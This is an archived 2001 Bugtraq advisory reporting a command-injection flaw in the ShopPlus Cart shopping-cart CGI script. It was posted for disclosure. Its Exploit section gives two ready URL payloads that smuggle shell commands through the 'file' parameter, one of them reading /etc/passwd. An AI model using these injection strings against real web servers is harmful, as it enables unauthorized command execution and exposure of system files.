[22533] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

ShopPlus Cart

daemon@ATHENA.MIT.EDU (Kernel|X|)
Wed Sep 5 15:36:36 2001

Date: Wed, 5 Sep 2001 12:06:56 -0700 (PDT)
Message-Id: <200109051906.f85J6u980496@voyager.myzona.net>
To: bugtraq@securityfocus.com
From: Kernel|X| <secure@punkass.com>

                    ------------[ advisory ]------------
name: ShopPlus Cart

Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/

Problem:
Script doesnt check symbols. any user can execute commands on webserver.

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

Bug found by Kernel|X| and aLph4Num3ric
E-Mail: 
secure@punkass.com               [kernel|x|]
alph4num3ric@crackdealer.com  [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[22533] in bugtraq

ShopPlus Cart

daemon@ATHENA.MIT.EDU (Kernel|X|)Wed Sep 5 15:36:36 2001

daemon@ATHENA.MIT.EDU (Kernel|X|)
Wed Sep 5 15:36:36 2001